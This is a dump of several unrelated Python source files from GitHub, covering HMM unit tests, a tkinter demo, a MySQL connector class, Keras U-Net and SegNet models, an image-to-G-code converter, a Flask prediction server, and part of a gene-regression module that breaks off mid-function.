self.aHMM_F.checkHMM()\n self.failUnless( allclose(self.aHMM_1.A, self.aHMM_C.A))\n self.failUnless( allclose(self.aHMM_1.A, self.aHMM_F.A))\n self.failUnless( allclose(self.aHMM_1.B, self.aHMM_C.B))\n self.failUnless( allclose(self.aHMM_1.B, self.aHMM_F.B))\n self.failUnless( allclose(self.aHMM_1.pi, self.aHMM_C.pi))\n self.failUnless( allclose(self.aHMM_1.pi, self.aHMM_F.pi))\n\n def test_multiple_learn_3(self):\n chains = [ ['1','2','2','2','2'], ['1','2','2','2','2','2','2'],\n ['2','2','2','2','2','2','2']]\n self.aHMM_1.multiple_learn(chains)\n self.aHMM_1.checkHMM()\n self.aHMM_C.multiple_learn(chains)\n self.aHMM_C.checkHMM()\n self.aHMM_F.multiple_learn(chains)\n self.aHMM_F.checkHMM()\n self.failUnless( allclose(self.aHMM_1.A, self.aHMM_C.A))\n self.failUnless( allclose(self.aHMM_1.A, self.aHMM_F.A))\n self.failUnless( allclose(self.aHMM_1.B, 
self.aHMM_C.B))\n self.failUnless( allclose(self.aHMM_1.B, self.aHMM_F.B))\n self.failUnless( allclose(self.aHMM_1.pi, self.aHMM_C.pi))\n self.failUnless( allclose(self.aHMM_1.pi, self.aHMM_F.pi))\n\n def test_multiple_learn_4(self):\n chains = [ ['2'] * 2, ['2'] * 3, ['2'] * 4]\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.multiple_learn(chains)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\n\n def test_multiple_learn_5(self):\n chains = []\n for i in xrange(10):\n chains.append(self.test.simulate(20))\n self.test.set_random_proba()\n self.test.multiple_learn(chains)\n self.test.checkHMM()\n\nclass TestEnsembleAveraging(unittest.TestCase):\n def setUp(self):\n self.det = hmm.HMM(['a'], ['1', '2'])\n self.test = hmm.HMM( ['a', 'b'], ['1', '2'] )\n self.gen = hmm.HMM( ['a', 'b'], ['1', '2'],\n array([[0.7, 0.3], [0.2, 0.8]]),\n array([[0.2, 0.6], [0.8, 0.4]]),\n array([0.5, 0.5]))\n self.aHMM = hmm.HMM(['a', 'b'], ['1', '2'])\n\n def test_ens_average_1(self):\n set_observations = [ ['2'] * 2, ['2'] * 3, ['2'] * 4]\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.ensemble_averaging(set_observations, \"unit\", 1000, 0)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\n\n def test_ens_average_2(self):\n chains = []\n for i in xrange(10):\n chains.append(self.gen.simulate(10))\n self.test.ensemble_averaging(chains, \"unit\", 1000, 1)\n self.test.checkHMM()\n\n def test_ens_average_3(self):\n chains = [ ['1', '2', '2', '2', '2'], ['1', '2', '2', '2', '2'],\n ['2','2','2','2','2','2','2']]\n self.aHMM.ensemble_averaging(chains, \"unit\", 1000, 0)\n self.aHMM.checkHMM()\n\n def test_ens_average_4(self):\n set_observations = [ ['2'] * 2, ['2'] * 3, ['2'] * 4]\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.ensemble_averaging(set_observations, \"Pall\", 1000, 0)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\n\n def test_ens_average_5(self):\n set_observations = [ ['2'] * 2, ['2'] * 3, ['2'] * 4]\n resA = self.det.A\n resB = array([[0.], [1.]])\n respi = self.det.pi\n self.det.ensemble_averaging(set_observations, \"Pk\", 1000, 0)\n self.failUnless( allclose(resA, self.det.A))\n self.failUnless( allclose(resB, self.det.B))\n self.failUnless( allclose(respi, self.det.pi))\nclass TestPickle(unittest.TestCase):\n \"\"\" test the pickle implementation \"\"\"\n \n hmmKlass = hmm.HMM\n\n def setUp(self):\n self.hmm1 = self.hmmKlass( ['a', 'b'], ['1', '2', '3'])\n self.hmm2 = self.hmmKlass( ['a', 'b'], ['1', '2', '3'])\n self.hmm2.set_random_proba()\n self.hmm3 = self.hmmKlass( ['a'], ['1'])\n self.hmm4 = self.hmmKlass( [], [])\n\n def _compare(self, h1, h2, SaveState=None):\n self.failUnless( allclose(h1.A, h2.A))\n self.failUnless( allclose(h1.B, h2.B))\n self.failUnless( allclose(h1.pi, h2.pi))\n self.failUnless( allclose(h1.N, h2.N))\n self.failUnless( allclose(h1.M, h2.M))\n if SaveState:\n self.failUnless( h1.X_index == h2.X_index) \n self.failUnless( h1.omega_X == h2.omega_X) \n self.failUnless( h1.omega_O == h2.omega_O) \n self.failUnless( h1.O_index == h2.O_index) \n\n def test_pickle_1(self):\n f = open('save.data', 'w')\n self.hmm1.saveHMM(f)\n f.close()\n f = open('save.data', 'r')\n self.hmm2.loadHMM(f)\n 
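# --- Illustrative aside (not part of the test file) ---
# The pickle tests here open files in text mode ('w'/'r'), which only
# works on Python 2; on Python 3, pickle requires binary file handles. A
# minimal modern round-trip of the model parameters (helper names made up):
import pickle

def save_params(path, A, B, pi):
    with open(path, 'wb') as f:         # binary mode
        pickle.dump((A, B, pi), f)

def load_params(path):
    with open(path, 'rb') as f:
        return pickle.load(f)
# --- end aside ---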
f.close()\n self.hmm2.checkHMM()\n self._compare(self.hmm1, self.hmm2)\n os.remove('save.data')\n\n\n def test_pickle_2(self):\n f = open('save.data', 'w')\n self.hmm1.saveHMM(f, 1)\n f.close()\n f = open('save.data', 'r')\n self.hmm3.loadHMM(f)\n f.close()\n self.hmm3.checkHMM()\n self._compare(self.hmm1, self.hmm3)\n os.remove('save.data')\n\n def test_pickle_3(self):\n f = open('save.data', 'w')\n self.hmm1.saveHMM(f, 1)\n f.close()\n f = open('save.data', 'r')\n self.hmm4.loadHMM(f)\n f.close()\n self.hmm4.checkHMM()\n self._compare(self.hmm1, self.hmm4)\n os.remove('save.data')\n\nclass TestPickleHMMC(TestPickle):\n hmmKlass = hmmc.HMM_C\n\nclass TestPickleHMMF(TestPickle):\n hmmKlass = hmmf.HMM_F\n\n\n#suite= unittest.makeSuite(TestLikelihood,'test')\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"gurneyalex/logilab-hmm","sub_path":"test/test_hmm.py","file_name":"test_hmm.py","file_ext":"py","file_size_in_byte":29170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72900383204","text":"from tkinter import *\nimport pygame.mixer\n\napp=Tk()\napp.title(\"hello flip\")\nflipper=IntVar()\n\ndef check_f():\n if(flipper.get()==1):\n print(\"cool\")\n else:\n print(\"not so cool\")\n\n\nCheckbutton(app,command=check_f,variable=flipper,text=\"flip\").pack()\n","repo_name":"agila26/pythonPgms","sub_path":"flipeg.py","file_name":"flipeg.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4515198656","text":"import copy\nimport mysql.connector\n\n\nclass ConnectDB:\n\n def __init__(self):\n # print(\"hello\")\n mydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"Nikhil@123\",\n database=\"LoginData\"\n )\n\n # pointer\n my_cursor = mydb.cursor()\n\n # create Database\n my_cursor.execute(\"CREATE DATABASE IF NOT EXISTS test_db\")\n\n # print all the database name\n # my_cursor.execute(\"SHOW DATABASES\")\n\n # for db in my_cursor:\n # print(db[0])\n\n # count no. 
of database\n # my_cursor.execute(\"SHOW DATABASES\")\n\n # print('Total count of database := ' + str(len(my_cursor.fetchall())))\n\n my_cursor.execute(\"SHOW DATABASES\")\n tuple_inside_list = my_cursor.fetchall()\n\n generator = (num for num in tuple_inside_list if num[0] == 'test_db')\n\n database_found = False\n for num in generator:\n database_found = True\n\n if database_found:\n print(\"Database found\")\n # my_cursor.execute(\"SHOW DATABASES\")\n try:\n my_cursor = mydb.cursor()\n my_cursor.execute(\"SHOW TABLES\")\n except:\n my_cursor.execute(\"CREATE TABLE\")\n\n\n # def prt(self):\n # print(\"3\")\n\n\n\n","repo_name":"nikhilsasi/RegistrationForm","sub_path":"dev/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28452360031","text":"\nfrom keras.models import Sequential\nfrom keras.layers import Reshape\nfrom keras.layers import Merge\nfrom keras.layers.core import Layer, Dense, Dropout, Activation, Flatten, Reshape, Permute\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import Convolution3D, MaxPooling3D, ZeroPadding3D\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D, UpSampling2D, ZeroPadding2D\nfrom keras.layers.convolutional import Convolution1D, MaxPooling1D\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.optimizers import Adam , SGD\nfrom keras.layers.embeddings import Embedding\nfrom keras.utils import np_utils\n# from keras.regularizers import ActivityRegularizer\nfrom keras import backend as K\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#input parameters is pretrained_weights and input size(x3)\n\ndef unet(pretrained_weights = None,input_size = (512,512,1)):\n inputs = Input(input_size)\n \n # Introduced a new layer to scale the architecture for image of size 512 * 512\n # Downsampling\n \n \n ##Layer 1:\n conv = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)\n conv = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv)\n pool = MaxPooling2D(pool_size=(2, 2))(conv)\n \n ##Layer 2:\n conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool)\n conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n \n ##Layer 3:\n conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)\n conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n \n ##Layer 4:\n conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)\n conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n \n ##Layer 5:\n conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)\n conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n\n #########Bottleneck\n conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)\n conv5 = Conv2D(1024, 3, activation = 
'relu', padding = 'same', kernel_initializer = 'he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n\n \n #Upsampling\n \n ## Upsampling layer 5:\n up6 = Conv2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))\n merge6 = concatenate([drop4,up6])\n conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)\n conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv6)\n \n ## Upsampling Layer 4:\n up7 = Conv2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))\n merge7 = concatenate([conv3,up7])\n conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)\n conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv7)\n\n ## Upsampling Layer 3:\n up8 = Conv2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))\n merge8 = concatenate([conv2,up8])\n conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)\n conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv8)\n\n ## Upsamplng Layer 2:\n up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))\n merge9 = concatenate([conv1,up9])\n conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)\n conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)\n \n ## Upsampling Layer 1:\n up10 = Conv2D(32, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv9))\n merge10 = concatenate([conv,up10])\n conv10 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge10)\n conv10 = Conv2D(32, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv10)\n \n conv10 = Conv2D(2, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv10)\n conv11 = Conv2D(1, 1, activation = 'sigmoid')(conv10)\n\n model = Model(input = inputs, output = conv11)\n\n model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])\n \n #model.summary()\n\n if(pretrained_weights):\n model.load_weights(pretrained_weights)\n\n return model\n\n\n\ndef segnet(nClasses , optimizer=None , input_height=360, input_width=480, kernel = 3, filter_size = 64, pad = 1,pool_size = 2 ):\n \n model = models.Sequential()\n model.add(Layer(input_shape=(3, input_height , input_width )))\n \n # encoder\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Convolution2D(filter_size, kernel, kernel, border_mode='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n \n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Convolution2D(128, kernel, kernel, border_mode='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n \n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Convolution2D(256, kernel, kernel, border_mode='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(pool_size, pool_size)))\n 
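# --- Illustrative aside (not part of models.py) ---
# Each SegNet encoder stage above repeats pad -> conv -> batchnorm -> relu
# -> pool, written against the legacy Keras 1.x Sequential/Convolution2D
# API. A rough equivalent of one stage in today's tf.keras functional API
# (a sketch assuming channels-last inputs, not the file's actual code):
from tensorflow.keras import layers

def encoder_stage(x, filters, kernel=3, pad=1, pool_size=2):
    x = layers.ZeroPadding2D(padding=(pad, pad))(x)
    x = layers.Conv2D(filters, (kernel, kernel), padding='valid')(x)
    x = layers.BatchNormalization()(x)
    x = layers.Activation('relu')(x)
    return layers.MaxPooling2D(pool_size=(pool_size, pool_size))(x)
# --- end aside ---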
\n model.add(ZeroPadding2D(padding=(pad,pad)))\n model.add(Convolution2D(512, kernel, kernel, border_mode='valid'))\n model.add(BatchNormalization())\n model.add(Activation('relu'))\n \n \n # decoder\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Convolution2D(512, kernel, kernel, border_mode='valid'))\n model.add( BatchNormalization())\n \n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Convolution2D(256, kernel, kernel, border_mode='valid'))\n model.add( BatchNormalization())\n \n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Convolution2D(128, kernel, kernel, border_mode='valid'))\n model.add( BatchNormalization())\n \n model.add( UpSampling2D(size=(pool_size,pool_size)))\n model.add( ZeroPadding2D(padding=(pad,pad)))\n model.add( Convolution2D(filter_size, kernel, kernel, border_mode='valid'))\n model.add( BatchNormalization())\n \n \n model.add(Convolution2D( nClasses , 1, 1, border_mode='valid',))\n \n model.outputHeight = model.output_shape[-2]\n model.outputWidth = model.output_shape[-1]\n \n \n model.add(Reshape(( nClasses , model.output_shape[-2]*model.output_shape[-1] ), input_shape=( nClasses , model.output_shape[-2], model.output_shape[-1] )))\n \n model.add(Permute((2, 1)))\n model.add(Activation('softmax'))\n \n if not optimizer is None:\n model.compile(loss=\"categorical_crossentropy\", optimizer= optimizer , metrics=['accuracy'] )\n \n return model\n\n\n","repo_name":"nikku1234/medimage","sub_path":"model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33287678070","text":"import cv2\nimport numpy as np\nimport sys\nimport math\n\nprint(sys.setrecursionlimit(3000))\n\ndef distance(a, b):\n return math.sqrt((a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2)\n\ndef gen_lift_pen_line(lift_height, feed_rate):\n return f'G1 Z{lift_height:.2f} F{feed_rate:.2f}'\n\ndef gen_lower_pen_line(depth, feed_rate):\n return f'G1 Z{-depth:.2f} F{feed_rate:.2f}'\n\ndef gen_move_to_loc_line(x, y):\n return f'G0 X{x:.2f} Y{y:.2f}'\n\ndef fill(x, y, pixels_to_draw, output_blob, h, w):\n if (x, y) not in pixels_to_draw:\n return\n else:\n output_blob.append((x, y))\n pixels_to_draw.remove((x, y))\n neighbours = [(x-1,y),(x+1,y),(x-1,y-1),(x+1,y+1),(x-1,y+1),(x+1,y-1),(x,y-1),(x,y+1)]\n for n in neighbours:\n fill(n[0], n[1], pixels_to_draw, output_blob, h, w)\n\ndef image_to_gcode(image, filename, max_depth=2.0, feed_rate=1000, lift_height=5, max_distance=100, edge_threshold=30, scale_x=1, scale_y=1, pen_thickness=1):\n _, width = image.shape\n gcode_lines = []\n\n gcode_lines.append(\"(G-code output for Universal Robots' Remote TCP & Toolpath URCap)\")\n gcode_lines.append(\"(UR Toolpath Generator Version : 1.0)\")\n gcode_lines.append(\"%PM0\")\n gcode_lines.append(\"N10 G21 G90\")\n\n x, y, w, h = 0, 0, image.shape[1], image.shape[0]\n\n pixels_to_draw = []\n for yy in range(y, y + h):\n for xx in range(x, x + w):\n if image[yy - y, xx - x] > edge_threshold:\n pixels_to_draw.append((xx, yy))\n\n print(\"Number of pixels = \", len(pixels_to_draw))\n blobs = []\n while pixels_to_draw:\n blob = []\n fill(pixels_to_draw[0][0], pixels_to_draw[0][1], pixels_to_draw, blob, width, h)\n blobs.append(blob)\n\n gcode_lines.append(gen_lift_pen_line(lift_height, feed_rate))\n pen_lifted = False\n\n print(\"Number of Blobs = \", 
len(blobs))\n prev_point = None\n for blob in blobs:\n first_point = blob[0]\n fp_x = first_point[0]\n fp_y = first_point[1]\n\n x_gcode = fp_x / width * 100 * scale_x\n y_gcode = fp_y / h * 100 * scale_y\n depth = max_depth * (1 - image[fp_y - y, fp_x - x] / 255)\n\n if prev_point is not None:\n if distance(prev_point, (x_gcode, y_gcode)) > max_distance:\n gcode_lines.append(gen_lift_pen_line(lift_height, feed_rate))\n pen_lifted = True\n \n if pen_lifted:\n gcode_lines.append(gen_move_to_loc_line(x_gcode, y_gcode))\n gcode_lines.append(gen_lower_pen_line(depth, feed_rate))\n pen_lifted = False\n\n # for each pixel\n for pixel in blob:\n px_x = pixel[0]\n px_y = pixel[1]\n x_gcode = px_x / width * 100 * scale_x\n y_gcode = px_y / h * 100 * scale_y\n depth = max_depth * (1 - image[px_y - y, px_x - x] / 255)\n\n if prev_point is not None:\n if distance(prev_point, (x_gcode, y_gcode)) > pen_thickness:\n # move pen to point\n gcode_lines.append(gen_move_to_loc_line(x_gcode, y_gcode))\n\n prev_point = (x_gcode, y_gcode)\n\n # lift pen\n gcode_lines.append(gen_lift_pen_line(lift_height, feed_rate))\n pen_lifted = True\n\n with open(filename, \"w\") as f:\n f.write(\"\\n\".join(gcode_lines))\n\n#####\n\n# Load the image file\nimage_path = \"/home/antonio/Desktop/python scripts/robot club/Jpeg2Gcode/test images/dots.png\" ######################### Change this to the path of your image file png or jpeg\nimage = cv2.imread(image_path)\n\n# Check if the image is valid\nif image is None:\n print(\"Error: Image file not found or not valid.\")\n sys.exit(1)\n\n# Convert to grayscale\ngray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Apply Sobel edge extraction to the image\nsobel_x = cv2.Sobel(gray_image, cv2.CV_64F, 1, 0, ksize=5)\nsobel_y = cv2.Sobel(gray_image, cv2.CV_64F, 0, 1, ksize=5)\nsobel_edges = cv2.magnitude(sobel_x, sobel_y)\nsobel_edges = cv2.normalize(sobel_edges, None, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\n\n################# Modify the values below to determine the working area as well as the pen thicknes. the pen thickness determines how we merge the lines. 
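# --- Illustrative aside (not part of this script) ---
# The recursive fill() above needs sys.setrecursionlimit(3000) and can
# still overflow on a large connected blob. The same blob extraction works
# with an explicit stack and no recursion (a sketch reusing the script's
# pixel/blob conventions; membership also moves into a set so each lookup
# is O(1) instead of scanning the list):
def fill_iterative(start, pixels_to_draw, output_blob):
    remaining = set(pixels_to_draw)
    stack = [start]
    while stack:
        p = stack.pop()
        if p not in remaining:
            continue
        remaining.discard(p)
        output_blob.append(p)
        x, y = p
        stack.extend((x + dx, y + dy)
                     for dx in (-1, 0, 1) for dy in (-1, 0, 1)
                     if (dx, dy) != (0, 0))
    pixels_to_draw[:] = [p for p in pixels_to_draw if p in remaining]
# --- end aside ---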
\n# Define your scaling factors and pen thickness here\nscale_x = 1\nscale_y = 1\npen_thickness = 5\n#################\nimage_to_gcode(sobel_edges, \"GCODE.nc\", scale_x=scale_x, scale_y=scale_y, pen_thickness=pen_thickness)\nprint(\"G-code saved as GCODE.nc\")\n\n \n\n","repo_name":"AntonioUl/Image2Gcode","sub_path":"jpeg2Gcode_liftoffeverymove.py","file_name":"jpeg2Gcode_liftoffeverymove.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5334594086","text":"import numpy as np\nfrom flask import Flask, request, jsonify\nimport pickle\n\napp = Flask(__name__)\nmodel = pickle.load(open('model/salary_model.pkl','rb'))\n\n@app.route('/api',methods=['POST'])\ndef predict():\n data = request.get_json(force=True)\n prediction = model.predict([[np.array(data['exp'])]])\n output = prediction[0]\n return jsonify(output)\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)\n\n ","repo_name":"statkclee/nlp2","sub_path":"flaskapp/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"7616814384","text":"import numpy as np\nimport pandas as pd\nimport scipy.stats\nimport copy\n\nfrom inferelator.utils import Debug, InferelatorData\nfrom inferelator.distributed.inferelator_mp import MPControl\nfrom inferelator.utils import Validator as check\n\nDEFAULT_CHUNK = 25\nPROGRESS_STR = \"Regression on {gn} [{i} / {total}]\"\n\n\nclass BaseRegression(object):\n # These are all the things that have to be set in a new regression class\n\n chunk = DEFAULT_CHUNK # int\n\n # Raw Data\n X = None # [K x N] float\n Y = None # [G x N] float\n G = None # int G\n K = None # int K\n\n def __init__(self, X, Y):\n \"\"\"\n Create a regression object and do basic data transforms\n\n :param X: Expression or Activity data [N x K]\n :type X: InferelatorData\n :param Y: Response expression data [N x G]\n :type Y: InferelatorData\n \"\"\"\n\n # Get the IDs and total count for the genes and predictors\n self.K = X.num_genes\n self.tfs = X.gene_names\n self.G = Y.num_genes\n self.genes = Y.gene_names\n\n # Rescale the design expression or activity data on features\n self.X = X\n self.X.zscore()\n\n self.Y = Y\n\n Debug.vprint(\"Predictor matrix {pr} and response matrix {re} ready\".format(pr=X.shape, re=Y.shape))\n\n def run(self):\n \"\"\"\n Execute regression separately on each response variable in the data\n\n :return: pd.DataFrame [G x K], pd.DataFrame [G x K]\n Returns the regression betas and beta error reductions for all threads if this is the master thread (rank 0)\n Returns None, None if it's a subordinate thread\n \"\"\"\n\n run_data = self.regress()\n\n if MPControl.is_master:\n pileup_data = self.pileup_data(run_data)\n else:\n pileup_data = None, None\n\n MPControl.sync_processes(\"post_pileup\")\n return pileup_data\n\n def regress(self):\n \"\"\"\n Execute regression and return a list which can be provided to pileup_data\n :return: list\n \"\"\"\n raise NotImplementedError\n\n def pileup_data(self, run_data):\n \"\"\"\n Take the completed run data and pack it up into a DataFrame of betas\n\n :param run_data: list\n A list of regression result dicts ordered by gene. 
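# --- Illustrative aside (not part of either file) ---
# The small Flask service in server.py above can be exercised with only
# the standard library. The {'exp': ...} payload matches what its
# predict() handler reads; host and port are Flask's defaults as
# configured in that script (assumed to be running locally):
import json
import urllib.request

req = urllib.request.Request(
    'http://127.0.0.1:5000/api',
    data=json.dumps({'exp': 1.8}).encode(),
    headers={'Content-Type': 'application/json'},
)
with urllib.request.urlopen(req) as resp:
    print(json.loads(resp.read()))      # the model's salary prediction
# --- end aside ---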
Each regression result should have `ind`, `pp`, `betas`\n and `betas_resc` keys with the appropriate data.\n :return betas, betas_rescale: (pd.DataFrame [G x K], pd.DataFrame [G x K])\n \"\"\"\n\n # Create G x K arrays of 0s to populate with the regression data\n betas = np.zeros((self.G, self.K), dtype=np.dtype(float))\n betas_rescale = np.zeros((self.G, self.K), dtype=np.dtype(float))\n\n # Populate the zero arrays with the BBSR betas\n for data in run_data:\n\n # If data is None assume a null model\n if data is None:\n raise RuntimeError(\"No model produced by regression method\")\n\n xidx = data['ind'] # Int\n yidx = data['pp'] # Boolean array of size K\n betas[xidx, yidx] = data['betas']\n betas_rescale[xidx, yidx] = data['betas_resc']\n\n d_len, b_avg, null_m = self._summary_stats(betas)\n Debug.vprint(\"Regression complete:\", end=\" \", level=0)\n Debug.vprint(\"{d_len} Models, {b_avg} Preds per Model ({nom} Null)\".format(d_len=d_len,\n b_avg=round(b_avg, 4),\n nom=null_m), level=0)\n\n # Convert arrays into pd.DataFrames to return results\n betas = pd.DataFrame(betas, index=self.Y.gene_names, columns=self.X.gene_names)\n betas_rescale = pd.DataFrame(betas_rescale, index=self.Y.gene_names, columns=self.X.gene_names)\n\n return betas, betas_rescale\n\n @staticmethod\n def _summary_stats(arr):\n d_len = arr.shape[0]\n b_avg = np.mean(np.sum(arr != 0, axis=1))\n null_m = np.sum(np.sum(arr != 0, axis=1) == 0)\n return d_len, b_avg, null_m\n\n\nclass RegressionWorkflow(object):\n \"\"\"\n RegressionWorkflow implements run_regression and run_bootstrap\n Each regression method needs to extend this to implement run_bootstrap (and also run_regression if necessary)\n \"\"\"\n\n def set_regression_parameters(self, **kwargs):\n \"\"\"\n Set any parameters which are specific to one or another regression method\n \"\"\"\n pass\n\n def run_regression(self):\n betas = []\n rescaled_betas = []\n\n MPControl.sync_processes(\"pre_regression\")\n\n for idx, bootstrap in enumerate(self.get_bootstraps()):\n Debug.vprint('Bootstrap {} of {}'.format((idx + 1), self.num_bootstraps), level=0)\n np.random.seed(self.random_seed + idx)\n current_betas, current_rescaled_betas = self.run_bootstrap(bootstrap)\n if self.is_master():\n betas.append(current_betas)\n rescaled_betas.append(current_rescaled_betas)\n\n MPControl.sync_processes(\"post_bootstrap\")\n\n return betas, rescaled_betas\n\n def run_bootstrap(self, bootstrap):\n raise NotImplementedError\n\n\ndef recalculate_betas_from_selected(x, y, idx=None):\n \"\"\"\n Estimate betas from a selected subset of predictors\n :param x: np.ndarray [N x k]\n Predictor matrix\n :param y: np.ndarray [N x 1]\n Response matrix\n :param idx: np.ndarray [k x 1]\n Predictors to use (unused predictors will return a beta of 0)\n If None, use all predictors\n :return: np.ndarray [k,]\n Estimated beta-hats\n \"\"\"\n\n # Create an array of size [k,] to hold the estimated betas\n best_betas = np.zeros(x.shape[1], dtype=np.dtype(float))\n\n # Use all predictors if no subset index is passed in\n if idx is None:\n idx = np.ones(x.shape[1], dtype=np.dtype(bool))\n\n # Convert boolean array to an array of indexes\n idx = bool_to_index(idx)\n\n # Subset the predictors with the index array\n x = x[:, idx]\n\n # Solve for beta-hat with LAPACK or return a null model if xTx is singular\n xtx = np.dot(x.T, x)\n if np.linalg.matrix_rank(xtx) == xtx.shape[1]:\n beta_hat = np.linalg.solve(np.dot(x.T, x), np.dot(x.T, y))\n else:\n beta_hat = np.zeros(len(idx), dtype=np.dtype(float))\n\n # 
Use the index array to write beta-hats\n # This yields the same size result matrix as number of predictors in x\n # (even if x is subset with an index)\n for i, j in enumerate(idx):\n best_betas[j] = beta_hat[i]\n return best_betas\n\n\ndef predict_error_reduction(x, y, betas):\n \"\"\"\n Predict the error reduction from each predictor\n :param x: np.ndarray [n x k]\n :param y: np.ndarray [n x 1]\n :param betas: np.ndarray [k x 1]\n :return: np.ndarray [k,]\n \"\"\"\n assert check.argument_type(betas, np.ndarray)\n\n (n, k) = x.shape\n pp_idx = index_of_nonzeros(betas).tolist()\n\n # Calculate the variance of the residuals\n ss_all = sigma_squared(x, y, betas)\n error_reduction = np.zeros(k, dtype=np.dtype(float))\n\n if len(pp_idx) == 1:\n error_reduction[pp_idx] = 1 - (ss_all / np.var(y, ddof=1))\n return error_reduction\n\n for pp_i in range(len(pp_idx)):\n # Copy the index of predictors\n leave_out = copy.copy(pp_idx)\n # Pull off one of the predictors\n lost = leave_out.pop(pp_i)\n\n # Reestimate betas for all the predictors except the one that we removed\n x_leaveout = x[:, leave_out]\n try:\n xt = 